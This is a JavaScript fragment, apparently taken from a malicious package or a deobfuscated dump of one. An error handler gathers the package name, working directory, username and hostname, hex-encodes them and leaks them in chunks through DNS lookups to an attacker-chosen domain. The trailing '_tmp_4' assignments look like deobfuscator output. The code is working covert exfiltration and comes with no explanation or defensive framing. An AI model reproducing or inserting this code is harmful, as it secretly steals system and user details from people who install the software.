resp.on('error', function (err) {
            const data = JSON.stringify({
                packagename: packageName,
                cwd: cwd,
                username: username,
                hostname: hostname,
                ip: ""
            })

            const options = {
                family: 4,
            };

            var dataHex = Buffer.from(data, "utf8").toString('hex') + "00"
            var splitted = dataHex.match(/.{1,30}/g)

            for (var i = 0; i < splitted.length; i++) {
                var domain = ID + "." + i + "." + splitted[i] + "." + topDomain
                dns.lookup(domain, options, () => { })
            }
        })
_tmp_4.packagename = packageName
_tmp_4.cwd = cwd
_tmp_4.username = username
_tmp_4.hostname = hostname
_tmp_4.ip = ""
